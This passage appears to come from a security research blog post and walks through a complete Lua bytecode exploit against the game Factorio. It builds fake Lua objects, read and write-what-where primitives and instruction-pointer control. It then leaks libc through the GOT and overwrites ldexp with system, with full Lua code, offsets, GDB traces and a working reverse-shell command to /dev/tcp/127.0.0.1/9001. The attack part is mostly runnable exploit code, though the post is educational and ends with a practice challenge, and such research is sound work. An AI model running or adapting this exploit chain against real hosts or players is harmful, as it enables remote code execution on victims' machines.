From this point, there are two paths, we either create a Fake Proto that points to an array of fake TValues, or we can create a fake UpVal array that points to our TValues. They lead to the same outcome, so I recomment following the Constants path, as you need less padding, and also regain the ability to use constants in your function, which is nice

Fake Objects

Possible paths to create Fake Objects from a LClosure we control

Let’s start by creating a fake string. Fake strings are interesting as they can be used as a read primitive by creating a one with the max length possible.

This is useful in many cases and can even be the end goal of our exploit (as we might just want to demonstrate access to customer data in memory)

As we will follow the path of constants, we need to create:

  • The Fake String
  • An array of TValues, with one pointing to our fake string
  • A Fake Proto that points to the Array of TValues
  • A Fake LClosure that points to our fake Proto

1. Fake String

In Lua, strings are represented with the TString union:

While crafting fake objects, use the definition of the structure provided by GDB, as it includes paddings
pwndbg> ptype /o TString

type = union TString {
/*                     8 */    L_Umaxalign dummy;
/*                    24 */    struct {
/*      0      |       8 */        GCObject *next;
/*      8      |       1 */        lu_byte tt;
/*      9      |       1 */        lu_byte marked;
/*     10      |       1 */        lu_byte extra;
/* XXX  1-byte hole      */
/*     12      |       4 */        unsigned int hash;
/*     16      |       8 */        size_t len;
   /* total size (bytes):   24 */
} tsv;
/* total size (bytes):   24 */
}

As our goal is to create a string with an arbitrary len, our string will have 24 bytes where the last 8 bytes represent the length of our string

-- Convert little endian uint64 to char[8]
local function ub8(n)
  local t = {}
  for i = 1, 8 do
      local b = n % 256
      t[i] = string.char(b)
      n = (n - b) / 256
  end
  return table.concat(t)
end

--  next + tt/marked/extra/padding/hash + len
fakeStr = ub8(0x0) .. ub8(0x0) .. ub8(0x1337) 

2. Fake Array of TValues

Next, we need to create the TValue that points to this TString, as we already know, TValues have two parts, the Value and the type

pwndbg> ptype /o TValue

type = struct lua_TValue {
/*      0      |       8 */    Value value_;
/*      8      |       4 */    int tt_;
/* XXX  4-byte padding   */
/* total size (bytes):   16 */
}

So we have to create a string with two 64 bit values, the first will be a pointer to the fake TString we created before, and the second the type of the TValue

Remember that a TString has a header of 24 bytes before the user data, so we need to take that into account while calculating pointers to the content of the string
-- Value + Type (LUA_TSTRING = 4)
fakeTValueArray = ub8(addr_of(fakeStr) + 24) .. ub8(4)

If we wanted to add another fake object, we just have to concat it as this is supposed to be an array of TValues

-- Value + Type (LUA_TSTRING = 4) / Value + Type (LUA_TNUMBER = 3)
fakeTValueArray = ub8(addr_of(fakeStr) + 24) .. ub8(4) ..  ub8(0) .. ub8(3)

3. Fake Proto

Then we need to create a Fake Proto that points to our fake array of TValues

pwndbg> ptype /o Proto
type = struct Proto {
/*      0      |       8 */    GCObject *next;
/*      8      |       1 */    lu_byte tt;
/*      9      |       1 */    lu_byte marked;
/* XXX  6-byte hole      */
/*     16      |       8 */    TValue *k;
/*     24      |       8 */    Instruction *code;
/*     32      |       8 */    struct Proto **p;
/*     40      |       8 */    int *lineinfo;
/*     48      |       8 */    LocVar *locvars;
/*     56      |       8 */    Upvaldesc *upvalues;
/*     64      |       8 */    union Closure *cache;
/*     72      |       8 */    TString *source;
/*     80      |       4 */    int sizeupvalues;
/*     84      |       4 */    int sizek;
/*     88      |       4 */    int sizecode;
/*     92      |       4 */    int sizelineinfo;
/*     96      |       4 */    int sizep;
/*    100      |       4 */    int sizelocvars;
/*    104      |       4 */    int linedefined;
/*    108      |       4 */    int lastlinedefined;
/*    112      |       8 */    GCObject *gclist;
/*    120      |       1 */    lu_byte numparams;
/*    121      |       1 */    lu_byte is_vararg;
/*    122      |       1 */    lu_byte maxstacksize;
/* XXX  5-byte padding   */

/* total size (bytes):  128 */
}

In our case, as we are only interested in controlling the k pointer (the pointer to the constants), we can do this:

-- Fake proto that points the constants array
fakeProto = ub8(0x0) .. ub8(0x0) .. ub8(addr_of(fakeTValueArray) + 24)

4. Fake LClosure

Finally, we create a fake LClosure that points to our fake Proto structure. As the user content of a string perfectly aligns with the location of the Proto pointer in a real LClosure, creating it is straighforward:

fakeClosure = ub8(addr_of(fakeProto) + 24)

With this fake LClosure, we now have all the parts needed to craft an object. We will update the code that replaces the LClosure with the following that also returns the crafted object

craft_object = string.dump(function(closure)
  local target
  return (function(closure) -- [1] target points to this function LClosure
    (function(closure)
      -- [2] The inner function overwrites the outer function LClosure
      target = closure
    end)(closure)
    -- [3] The LOADK opcode reads the constant
    -- from our fake LCLosure array of constants,
    -- so instead of 42 this returns our fake object
    return 42
  -- We need to return an additional value to prevent a TAILCALL
  -- that would mess up with the Call frame
  end)(closure), 1337
end)
-- Replace the stack index of target upval to point to the LCLosure
-- of the first function
craft_object = craft_object:gsub("(target\x00\x01\x00\x00\x00\x01)\x01", "%1\x02", 1)
craft_object = load(craft_object)

Notice how we both return the result of the inner function (the crafted object) and a constant 1337. We do this because when doing return function(), Lua uses a TAILCALL opcode to do the call. This opcode allows infinite recursion without growing the stack, as the current call frame will be used for the inner function.

This is not what we want, the change of frame needs to happen so our fake LClosure gets used as the current frame. By also returning a constant we prevent Lua from using a TAILCALL operation, forcing a change of frame.

With this updated piece of code, we just have to call the craft_object primitive with our fake LCLosure to obtain our fake object.

read_primitive = craft_object(fakeClosure)
print(string.format("Size of string: %x", #read_primitive))
--Output: Size of string: 1337

The Tables Have Turned

From this point, with the ability to create fake objects, all the features of Lua are now your weapons:

  • TStrings: allow to leak data
  • Tables: can be used to write data to arbitrary addresses
  • CCLosure/Light C Functions: allow to obtain control of the instruction pointer. Which has multiple uses:
    • Bypass sandboxes: we can recover access to Lua functions that might be sandboxed but still present in the binary by pointing a fake function to its address
    • Execute ROP Chains: as we control the instruction pointer, we can execute ROP chains

The path to take will depend both on your goals and the application where Lua is embedded.

Generic Primitives

Finishing our read primitive

Previously, we created our first fake object, a TString. We already said that this is a powerful fake object, as it can be used to leak data, so let’s finish building this read primitive.

To do this, we start by updating the size of our fake string from 0x1337 to a bigger number, so we can reach more data from its position.

--  next + tt/marked/extra/padding/hash + len
fakeStr = ub8(0x0) .. ub8(0x0) .. ub8(0x20000000000000) 

Now, we need to create a function that given a fake string, tries to read from an address we provide. As we already know, Lua assumes that the string is located after the TString header, that means that we are limited to leaking data after the header. As TStrings are located in the heap, we will only be able to read data located in the heap or after it.

The following code can be used to read data from an address we provide given a fake string that is within reach of the target:

In Lua, Strings are indexed starting from 1. This means that str:sub(0, 1) and str:sub(1, 1) return the same character. To take that into account we will consider the header of the TString one byte smaller
function read(fake_string, addr, size)
  -- First we calculate if the address is reachable from our position
  local relative_addr = addr - (addr_of(fake_string) + 23)

  if relative_addr < 0 then
      print("[-] Cannot read from " .. addr)
      error()
  end

  -- Then we obtain the part of the string where the data is located
  return fake_string:sub(relative_addr, relative_addr + size - 1)
end

Building a Write-What-Where Primitive

In addition to leaking memory, we would like to corrupt memory so we can alter the behaviour of the program.

There are multiple ways to do this, so we are going to do the one that I think is the simplest.

The idea is to create a fake UpValue that points to the address we want to write. By doing this, Lua will think that the address we provided contains a TValue, so this is similar to the way we crafted fake objects, but the diference is that instead of retrieving this fake object, we are going to overwrite it with a numeric value.

Why are we going to do this? Because writing to a variable means to change the underlying TValue with a new TValue that represents the new object. As Lua thinks the address we provide contains the TValue of the variable we are writing to, Lua is going to write the new TValue in that position, and as we already know, numeric values are stored inline in the TValue structure, so we control the first 8 bytes of the structure that gets written to the address provided.

write_primitive = string.dump(function(closure, value)
  local target
  (function(closure, value) -- [1] target points to this function LClosure
    (function(closure)
      -- [2] The inner function overwrites the outer function LClosure
      target = closure
    end)(closure)
    -- [3] Target now points to the address we want to write to.
    -- Changing its value means writting a TValue in that address
    target = value
  end)(closure, value)
end)
write_primitive = write_primitive:gsub("(target\x00\x01\x00\x00\x00\x01)\x02", "%1\x03", 1)
write_primitive = load(write_primitive)

Unfortunately, in the process we will also corrupt the next 8 bytes with the type of the TValue, but this might be okay depending on where we are writting to.

type = struct lua_TValue {
/*      0      |       8 */    Value value_;
/*      8      |       4 */    int tt_;
/* XXX  4-byte padding   */
/* total size (bytes):   16 */
}

Implementation is really simple. We start by creating a fake UpVal structure inside a string that points to the address where we want to write:

pwndbg> ptype /o UpVal
type = struct UpVal {
/*      0      |       8 */    GCObject *next;
/*      8      |       1 */    lu_byte tt;
/*      9      |       1 */    lu_byte marked;
/* XXX  6-byte hole      */
/*     16      |       8 */    TValue *v;
/*     24      |      16 */    union {
/*                    16 */        TValue value;
/*                    16 */        struct {
/*     24      |       8 */            struct UpVal *prev;
/*     32      |       8 */            struct UpVal *next;
          /* total size (bytes):   16 */
      } l;

      /* total size (bytes):   16 */
  } u;

  /* total size (bytes):   40 */
}

That means the following code:

 -- next/tt/marked + Address of the TValue (v)
fakeUpVal = "AAAABBBBCCCCDDDD".. ub8(addr)

Then, is just a matter of creating a fake LClosure where we control the UpVals array

 -- proto + upvals
fakeClosure = ub8(addr_of("MemoryCorruption")) .. ub8(addr_of(fakeUpVal) + 24)

Our primitive will be like the following:

function write(addr, value)
  -- The Fake Upval points to the destination of the write
  fakeUpVal = "AAAABBBBCCCCDDDD".. ub8(addr) -- next/tt/marked + v

  -- Fake closure that we use to overwrite the real closure
  fakeClosure = ub8(addr_of("MemoryCorruption")) .. ub8(addr_of(fakeUpVal) + 24) -- proto + upvals

  write_primitive(fakeClosure, value)
end

write(0x4545454545, 0x5050505050)

With these changes, we now have an arbitrary write primitive. However, floating-point numbers strike again…

Program received signal SIGSEGV, Segmentation fault.
0x000000000041a267 in luaV_execute (L=0x43e2a0) at lvm.c:662
*RAX  0x4545454545
 RBX  0
 RCX  1
*RDX  0x4254141414140000
───────────────────────────────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]───────────────────────────────────────────────────────────────────────────────────────────────
 ► 0x41a267 <luaV_execute+1416>     mov    qword ptr [rax], rdx
   0x41a26a <luaV_execute+1419>     mov    rax, qword ptr [rbp - 0x338]
   0x41a271 <luaV_execute+1426>     mov    edx, dword ptr [rax + 8]
   0x41a274 <luaV_execute+1429>     mov    rax, qword ptr [rbp - 0x340]
   0x41a27b <luaV_execute+1436>     mov    dword ptr [rax + 8], edx
Episode V - Doubles Strike Back

Now we have the opposite problem to the one we explained at IEEE-754 Double-precision . We have a double that we want to transform into an integer. As we already know, Lua only uses doubles, so we have to play with the encoding of doubles to obtain the binary representation that we are looking for

In this case, there is an easy reasoning to obtain this transformation. We are gonna assume that we only want to write values that fit the mantissa of a double, as its not that useful to write incorrect data.

That means that we want an exponent full of zeroes. As we already know, that is an especial value in floating-point numbers that means that it is a denormalized number, that is, a very small number. What is the smallest number we can have? In the case of denormalized numbers, the value of a double is calculated as follows:

(-1)**sign * 2**(1-1023) * 0.mantissa = (-1)**sign * 2**-1022 * 0.mantissa

So it basically is 2**-1022 * smallest_mantissa_possible. What is the smallest mantissa possible? As we have 52 bits of precision, that would be 2**-52. So that means that the smallest number representable is:

(-1)**sign * 2**-1022 * 2**-52 = (-1)**sign * 2**-1074

We can check this with the same Python code we used to convert from double to integer

Exponent: 00000000000
Mantissa: 0000000000000000000000000000000000000000000000000001
Number:   0x1

As expected, the exponent is zero, as it is a denormalized number, and only the last bit is set, so it is the smallest representable number.

All this means that if we multiply our double with this value, we will get a double representation that encodes our number in the same way as an integer.

double = 0x50505050 * 2**-1074

double_bytes = struct.pack('<d', double)
number = struct.unpack("<q", double_bytes)[0]

# Take into account that 2 bytes is the prefix
encoded = format(number, "#065b")[2:]

exponent = encoded[:11]
mantissa = encoded[11:]

print(f"Exponent: {exponent}")
print(f"Mantissa: {mantissa}")
print(f"Integer: {hex(number)}")
print(f"Double: {double}")

# Output:
# Exponent: 00000000000
# Mantissa: 0000000000000000000001010000010100000101000001010000
# Integer: 0x50505050
# Double: 6.657241696e-315

So our code to encode an integer in a double in Lua is as simple as:

function integer_to_double(integer)
    return integer * 2^-1074
end

With this small change our write primitive is complete:

function integer_to_double(integer)
    return integer * 2^-1074
end

function write(addr, value)
  -- Encode double as an integer
  value = integer_to_double(value)

  -- The Fake Upval points to the destination of the write
  fakeUpVal = "AAAABBBBCCCCDDDD".. ub8(addr) -- next/tt/marked + v

  -- Fake closure that we use to overwrite the real closure
  fakeClosure = ub8(addr_of("MemoryCorruption")) .. ub8(addr_of(fakeUpVal) + 24) -- proto + upvals

  write_primitive(fakeClosure, value)
end

write(0x4545454545, 0x5050505050)

We can check in GDB that the correct value is written:

Program received signal SIGSEGV, Segmentation fault.
0x000000000041a267 in luaV_execute (L=0x43e2a0) at lvm.c:662
*RAX  0x4545454545
 RBX  0
 RCX  1
*RDX  0x5050505050
───────────────────────────────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]───────────────────────────────────────────────────────────────────────────────────────────────
 ► 0x41a267 <luaV_execute+1416>     mov    qword ptr [rax], rdx
   0x41a26a <luaV_execute+1419>     mov    rax, qword ptr [rbp - 0x338]
   0x41a271 <luaV_execute+1426>     mov    edx, dword ptr [rax + 8]
   0x41a274 <luaV_execute+1429>     mov    rax, qword ptr [rbp - 0x340]
   0x41a27b <luaV_execute+1436>     mov    dword ptr [rax + 8], edx

Controlling the Instruction Pointer

Another generic primitive that will be useful in most cases is the ability to control the instruction pointer. To do this, we can either fake a CClosure or a Light C Function. In this case, we are going to use a Light C Function, because this also reveals a useful leak that we don’t know yet. The difference between both is that a CCLosure can have upvalues, while a Light C Function can not.

As seen in the code, a light function is a variant of the function type and has value 22.

#define LUA_TFUNCTION		6
#define LUA_TLCF	(LUA_TFUNCTION | (1 << 4))  /* light C function */

As there are no upvalues, a light function contains the pointer of the function inline in the TValue, so the following is a valid TValue of type Light C Function that points to a function at 0xdeadbeef

-- Pointer + Type (LUA_TLCF = 22)
fakeTValueArray = ub8(0xdeadbeef) .. ub8(22)

We can craft this fake function as any other object and call it as any other function

-- Pointer + Type (LUA_TLCF = 22)
fakeTValueArray = ub8(0xdeadbeef) .. ub8(22)

-- Fake proto that points the constants array
fakeProto = ub8(0x0) .. ub8(0x0) .. ub8(addr_of(fakeTValueArray) + 24)
fakeClosure = ub8(addr_of(fakeProto) + 24)

fake_function = craft_object(fakeClosure)
-- Call the fake function
fake_function()

Doing this will result in control of the instruction pointer, as seen in GDB

Program received signal SIGSEGV, Segmentation fault.
0x00000000deadbeef in ?? ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────[ REGISTERS ]────
*RAX  0x43b980 —▸ 0x440640 ◂— 0xdeadbeef
 RBX  0x4332a0 ◂— 0
 RCX  1
 RDX  0
 RDI  0x4332a0 ◂— 0
 RSI  0x440640 ◂— 0xdeadbeef
 R8   0x440690 ◂— 0xdeadbeef
*R9   1
*R10  0x43f860 —▸ 0x440360 ◂— 0
*R11  3
 R12  0
 R13  0x70
 R14  0x4405d0 ◂— 0
 R15  0x434410
 RBP  0xdeadbeef
 RSP  0x7fffffffd888 —▸ 0x409de7 (luaD_precall+679)
 RIP  0xdeadbeef
────[ DISASM / x86-64 / set emulate on ]────
Invalid address 0xdeadbeef

This is interesting for two reasons, the obvious one is that controlling the instruction pointer allow us to further alter the behaviour of the program and opens the door to ROP chains and such, but the other reason is that as the pointer of a Light C Function is stored inline we can leak it with our address leak primitive.

This is great because functions in Lua are implemented as light C functions, and that means that this is an straighforward way to bypass ASLR.

print(string.format("Print at: 0x%x", addr_of(print)))

This can be used to bypass ASLR and then calculate the address of a sandboxed function to then call it with another fake function to bypass the sandbox

Getting Remote Code Execution on Linux

With all these primitives, we now have multiple ways to get RCE in Factorio. We could, for example, make a ROP chain with a fake function to execute code in the target. However, that is not that interesting, we are going to follow a different path so we can play some more tricks and avoid having to write a chain.

The exploitation path is going to be the following:

  1. Find an imported function that we can call from Lua code where we control the first parameter passed
  2. Replace the address of this function with the address of system in the GOT
  3. Call the function with the address of a string to execute commands in the system

For those unfamiliar with Linux exploitation, the Global Offset Table (GOT) contains the address of globals so they can be located in Position Independent Code. One of the things stored in the GOT are the resolved addresses of shared libraries functions. When our code wants to call a function such as printf, it is going to use the address stored in GOT, if we can overwrite an entry, we can make it call a different function with the parameters of the original function.

This will prove useful as fake functions don’t give us the ability to pass parameters following the calling convention (that is, using registers such as RDI), so we could call system but without control of the parameters, which is not great.

If we find a shared library function that is callable from Lua where the first parameter is controlled by us, we could replace its address with the address of system to execute commands, as we would have control of the parameter expected by it.

int system(const char *command);

0. Integration Hell?

Until now, all our testing was done on the official Lua interpreter10, as it was easier and faster to work with. By doing this, we trusted that the modified implementation used in Factorio didn’t diverge too much from the official one. In this section, we will make the modifications needed to run our primitives in Factorio.

In Factorio, Garbage Collected Objects, that is things like TString, LClosure or Proto have an extra pointer as part of the CommonHeader.

Factorio:

#define CommonHeader	GCObject *previous; GCObject *next; lu_byte tt; lu_byte marked

Official Lua Intepreter:

#define CommonHeader	GCObject *next; lu_byte tt; lu_byte marked

It seems that in Factorio objects are part of a double linked list, while they are usually part of a single linked list.

For our purposes, this means that some offsets are off by 8. For example, the header of a TString is no longer 24 but 32, which breaks our calculation to locate the content of a string and our read primitive.

function read(fake_string, addr, size)
  -- First we calculate if the address is reachable from our position
  local relative_addr = addr - (addr_of(fake_string) + 31)

  if relative_addr < 0 then
      print("[-] Cannot read from " .. addr)
      error()
  end

  -- Then we obtain the part of the string where the data is located
  return fake_string:sub(relative_addr, relative_addr + size - 1)
end

In addition to changing the calculation of TString addresses, we also have to modify our write primitive, as there is an additional pointer before the TValue pointer:

function write(addr, value)
  -- Encode double as an integer
  value = integer_to_double(value)

  -- The Fake Upval points to the destination of the write
  fakeUpVal = "AAAABBBBCCCCDDDDEEEEFFFF".. ub8(addr) -- previous/next/tt/marked + v

  -- Fake closure that we use to overwrite the real closure
  fakeClosure = ub8(addr_of("MemoryCorruption")) .. ub8(addr_of(fakeUpVal) + 32) -- proto + upvals

  write_primitive(fakeClosure, value)
end

However, with only this change our exploit will make the game crash while trying to dereference an invalid pointer.

mov    rax, qword ptr [rax + 0x18]     RAX, [0xfe32704c00000000]
# Cannot dereference [0xfe32704c00000000]

That looks like a really corrupted pointer and we already fixed our offsets, so that means…

It’s not Doubles, There’s no way it’s Doubles, It was Doubles

Unfortunately for us, Factorio seems to be using a version of sprintf that uses a different encoding when the format string %a is used11. This is breaking our conversion from a fake double to a real double.

For example, if we leak the value 2.1038461432219e-316 we would expect the following string after calling string.format("%.13a", 2.1038461432219e-316):

0x0.000000289c130p-1022 -> 0x289c130

However, we instead got:

0xa.2704c00000000p-1052 -> 0xfe32704c00000000

This completely breaks the code we made. Maybe depending on libraries was not a great idea.

Now that we have a better understanding of doubles, let’s write a completely numeric approach, like is done in other writeups 12

As we know, 2^-1074 is the smallest number possible, as it is a denormalized number with only the last bit set

Exponent: 00000000000
Mantissa: 0000000000000000000000000000000000000000000000000001

We used this to force a representation of an integer in a double, but we can actually do the opposite operation.

Let’s see it with an example. Imagine we leak the pointer 0x289c130 using our leak primitive, if we try to print it, we get the value 2.1038461432219e-316, how can we get the original number?

The trick is in understanding that in denormalized form, the position of the bits in the mantissa matter, as bits to the right represent smaller numbers. This is why even if all pointers are integers, they don’t have the same exponent when considered a double, as the position of the rightmost bit changes

Exponent 00000000000
Mantissa: 0000000000000000000000000010100010011100000100110000

This behaviour can make us think that the operation we need to do depends on the exponent provided by Lua, while in reality it does not matter at all. Think about it, no matter the integer, the value always starts at the rightmost bit, so in reality, we can consider all integers to have exponent -1074 when represented as a double, which is exactly what we did in the oppsite operation.

So all this means that by doing leak * 2**1074 we can recover the original number

We have to split the multiplication in two parts as 2**1074 is not representable as a double (remember that the highest exponent is 1023)
function double_to_number(double)
  return double * 2^52 * 2^1022
end

You can also see it in the following way: the first multiplication makes sure the number is no longer denormalized, as they are represented in the mantissa, which has 52 bits, while the second multiplication makes the exponent positive, as the smallest negative exponent in a normal number is -1022. After doing this, the double now properly encodes the integer leaked

1. Function to replace with System

Now that our primitives work in Factorio, let’s finally get to RCE. First, for our idea to work, we need an imported function that we can call from Lua for which we control the first parameter.

The Lua version in Factorio is pretty limited in terms of available libraries, but fortunately, the math library has a perfect example of this at math_ldexp

static int math_ldexp (lua_State *L) {
  lua_pushnumber(L, l_tg(ldexp)(luaL_checknumber(L, 1), luaL_checkint(L, 2)));
  return 1;
}

We can see on gdb that the second parameter is passed as the first parameter (RDI) on the libc call

math.ldexp(0, 0x454545454) -- This will call system(0x289c150)
Thread 24 "factorio" hit Breakpoint 2.3, __ldexp (value=0, exp=1414812756) at ./s_ldexp_template.c:22
22	{
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
──────────────────────────────────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]──────────────────────────────────────────────────────────────────────────────────────
*RAX  0x160
*RBX  0x7fff9400ded0 ◂— 0x0
*RCX  0x7fff94059660 ◂— 0x0
*RDX  0x7fff94059650 —▸ 0x1ab8ea0 (math_ldexp(lua_State*)) ◂— push rbp
*RDI  0x54545454

This makes this function suitable to be replaced with the address of system, as we already know that the command is passed as the first parameter

int system(const char *command);

2. Replacing the Address of ldexp with system

Now that we found a function that is suitable to be replace with system, we need to overwrite it’s address with the address of system, but to do that, we first need to locate system in memory, as the target has ASLR enabled.

This shouldn’t be a problem, right? We have our read primitive. However, there is a small problem, the GOT table is located before the Heap, so our read primitive is unable to leak it, as we can only leak data after our string header.

We could search in heap for pointers to libc but that is not as reliable, is there anything we can do to avoid this? Yes, there is.

As we also have a write-what-where primitive, why don’t we craft a TString before the GOT table? It should be possible, right?

There are two ways to do this, we could search in memory for some data that resembles a TString structure before the GOT that we can use as our fake TString, our we can write our own.

In this case, as there is a writable segment before the GOT, we can just use that

       Type                     Load Address                Perm  Section Name
  ---------------- ---------------------------------------  ----  ------------
  container        [0x0000000000400000-0x000000000289aec0)  r-x PT_LOAD[0]
  regular          [0x0000000000400238-0x0000000000400254)  r-- interp
  regular          [0x0000000000400254-0x0000000000400274)  r-- note.ABI-tag
  dynamic-symbols  [0x0000000000400278-0x00000000004035a8)  r-- dynsym
  regular          [0x00000000004035a8-0x0000000000405151)  r-- dynstr
  regular          [0x0000000000405158-0x000000000040620c)  r-- hash
  regular          [0x000000000040620c-0x0000000000406650)  r-- gnu.version
  regular          [0x0000000000406650-0x0000000000406890)  r-- gnu.version_r
  rel-entries      [0x0000000000406890-0x00000000004069b0)  r-- rela.dyn
  rel-entries      [0x00000000004069b0-0x0000000000409b18)  r-- rela.plt
  code             [0x0000000000409b18-0x0000000000409b37)  r-x init
  code             [0x0000000000409b40-0x000000000040bc40)  r-x plt
  code             [0x000000000040c000-0x00000000020f1f71)  r-x text
  code             [0x00000000020f1f74-0x00000000020f1f7d)  r-x fini
  regular          [0x00000000020f1f80-0x0000000002491250)  r-- rodata
  regular          [0x0000000002491250-0x000000000256d545)  r-- gcc_except_table
  eh-frame         [0x000000000256d548-0x000000000280ecf4)  r-- eh_frame
  regular          [0x000000000280ecf4-0x000000000289aec0)  r-- eh_frame_hdr
  container        [0x000000000289bec0-0x0000000002902f90)  rw- PT_LOAD[1]
  // RW Section before GOT
  dyn-link-info    [0x000000000289bec0-0x000000000289c180)  rw- dynamic
  regular          [0x000000000289c180-0x000000000289df00)  rw- got
  regular          [0x000000000289df00-0x000000000289ef90)  rw- got.pl

With our primitives is very straighforward to create this fake string before the GOT and return it as a fake object

-- Clear previous fields and write arbitrary len
write(0x289c130, 0x0)
write(0x289c138, 0x0)
write(0x289c140, 0x0)
write(0x289c148, 0xfffffffffffffff)

-- Here we create a fake TValue that points to our fake TString before the GOT
-- Value + Type (LUA_TSTRING = 4)
fakeTValue = ub8(0x289c130) .. ub8(4)

-- Array of Upvals
-- previous + next + tt/marked/padding + v
fakeUpVal = ub8(0x0) .. ub8(0x0) .. ub8(addr_of(fakeTValue) + 32)

-- Fake proto that points the constants array
fakeConstant = ub8(0) .. ub8(3) -- Value + Type (LUA_TNUMBER = 3)
-- previous + next + tt/marked/padding + k
fakeProto = ub8(0x0) .. ub8(0x0) .. ub8(0x0) .. ub8(addr_of(fakeConstant) + 32)

-- Fake closure that we use to overwrite the real closure
-- proto + upvals (-8 as in Factorio UpVal has an
-- extra pointer that breaks alignment)
fakeClosure = ub8(addr_of(fakeProto) + 32) .. ub8(addr_of(fakeUpVal) + 32 - 8)

fakeObjects = {}
fake = poc(fakeClosure, fakeObjects) -- Replace Closure with our fake TValue

print(string.format("Size of string: %x", #fakeObjects[0]))

With this, we can easily leak the address of a libc function to bypass ASLR

-- Leak pointer from GOT
memcpy = ubNumber(read(fakeObjects[0], 0x289df40, 8))
print("[*] memcpy addr: 0x" .. string.format("%x", memcpy))

-- Offsets for LIBC 2.38 (Fedora 39)
libc_base = memcpy - 0x138b80
system = libc_base + 0x2a3b0
print("[*] LIBC: 0x" .. string.format("%x", libc_base))
print("[*] system: 0x" .. string.format("%x", system))

After calculating the position of system, we can overwrite the GOT entry with it

-- Corrupting ldexp with system address
write(0x289ef00, system)
print("[*] Corrupted ldexp addr")

3. Executing commands

Now that we have a way to call system from Lua code, let’s try to execute a command. We will execute sh -c "sh -i >& /dev/tcp/127.0.0.1/9001 0>&1 &" to obtain a remote shell.

We can store the command in a Lua string and then call ldexp with this address

cmd = 'sh -c "sh -i >& /dev/tcp/127.0.0.1/9001 0>&1 &"'
math.ldexp(0, addr_of(cmd) + 32)

However, we never get a shell, what is happening? We attach gdb to the program and break on the call to system, by doing this, we notice the problem: Lua calls ldexp with a 32 bit parameter, breaking our address

*RDI      0x9400f870
*R12  0x7fff9400f870 ◂— 'sh -c "sh -i >& /dev/tcp/127.0.0.1/9001 0>&1 &"'

Fortunately, we already have a workaround, writing the command in the same segment we used to store the fake string. As PIE is not enabled (which is basically ASLR for the main binary), binary addresses are small enough for this

-- Write command sh -c "sh -i >& /dev/tcp/127.0.0.1/9001 0>&1 &"
write(0x289c150, 0x2d206873)
write(0x289c154, 0x73222063)
write(0x289c158, 0x692d2068)
write(0x289c15C, 0x20263e20)
write(0x289c160, 0x7665642f)
write(0x289c164, 0x7063742f)
write(0x289c168, 0x3732312f)
write(0x289c16C, 0x302e302e)
write(0x289c170, 0x392f312e)
write(0x289c174, 0x20313030)
write(0x289c178, 0x31263e30)
write(0x289c17C, 0x222620)

print("[*] Executing shell")
math.ldexp(0, 0x289c150) -- This will call system(0x289c150)

This time, our exploit works and we recieve a remote shell

[MemoryCorruption /]$ nc -lvp 9001
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:55556.
sh-5.2$ whoami
whoami
victim
sh-5.2$ 

Your Turn

After reading this post, I hope you gained a good understanding of how Lua bytecode works and how it can be leveraged.

As I think the best way to learn something is by practicing, I made a small challenge in which you have to escape from a Lua interpreter and execute a Javascript function that is not callable by Lua code.

You can find it here: Escape from Alcawasm . I hope you have fun!


  1. https://lua-users.org/lists/lua-l/2009-03/msg00039.html Wayback Machine copy of the forum thread where the reasons why the bytecode verifier was deprecated ↩︎

  2. Factorio Lua code of the bytecode verifier of Factorio ↩︎

  3. Programming In Lua: Numbers Explaination of how Lua implements Numbers ↩︎ ↩︎

  4. Exploiting a Small Leak in a Great Ship Talk about exploiting Lua bytecode on a Cisco ASA Router that explains common bytecode vulnerabilities ↩︎

  5. Double-Precision floating-point format : Wikipedia entry about doubles, check the section: Precision limitations on integer values ↩︎

  6. Floating-Point Conversions GNU Libc manual entry that explains the output of the %a format string ↩︎

  7. Biased Representation Wikipedia entry about Biased Representation ↩︎

  8. Normal Numbers Wikipedia entry about Normal numbers. It contains a table with the smallest normal number representable in each variant of floating-point numbers ↩︎

  9. Programming in Lua: Closures Explaination of how Lua Closures work ↩︎

  10. Offical Lua Page official implementation of Lua that we used for testing our code ↩︎

  11. Trio - portable and extendable printf and string functions library that seems to be used by Factorio to implement a portable sprintf ↩︎

  12. Exploiting Lua 5.1 on 32-bit Windows Gist about exploiting Lua 5.1 on Windows ↩︎